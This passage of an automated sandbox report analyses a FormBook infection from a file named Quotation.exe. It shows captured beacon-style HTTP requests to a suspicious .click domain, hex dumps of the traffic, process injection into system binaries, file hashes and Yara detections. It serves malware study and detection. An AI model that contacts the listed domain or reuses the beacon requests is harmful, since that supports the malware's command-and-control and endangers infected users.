                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    56192.168.2.450058172.67.192.207803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 17:00:39.412111044 CET355OUTGET /6wln/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=gk6EUi6sTSAX9bdw0FF5qpRAaiCMK60Ih0859QLLBHNHxoVqcUaJ5GMhXvTh6fdanKOBrZcLB2201dVdXc1CFZPk2QWw1QtBA7h//Mif1prUBHwa19uPi+o= HTTP/1.1
                                                                                                                    Host: www.3kw40881107247y.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 17:00:40.596328020 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 16:00:40 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZKHMW50wIECu3rQv9UNsnAo6W2rExEmNdEYLtjCRwITP71zS%2FtmcDY6jG1o0%2BFY0Dn6830cTRMlIunNhiu2je%2Fua9qXWvGsd02jSu2UCTGVX9NVQRYCGkpTLTrN9%2FDFpDr0d23UAQAQb6SWv"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e4dc5fe04414-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=355&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page
                                                                                                                    Nov 21, 2024 17:00:40.596507072 CET79INData Raw: 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:10:56:33
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\Quotation.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                                                    Imagebase:0x730000
                                                                                                                    File size:1'213'440 bytes
                                                                                                                    MD5 hash:C7D6D34DDD68D74C5A19706389C194B3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:10:56:35
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                                                    Imagebase:0xc0000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1807163533.0000000002350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1807834480.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1807419459.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:10:56:38
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe"
                                                                                                                    Imagebase:0x710000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4153920591.0000000002D80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:10:56:39
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                                                    Imagebase:0xbb0000
                                                                                                                    File size:135'680 bytes
                                                                                                                    MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4153859455.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4154038059.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4152729968.0000000000720000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:10:56:54
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe"
                                                                                                                    Imagebase:0x710000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4155924526.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:10:57:06
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    No disassembly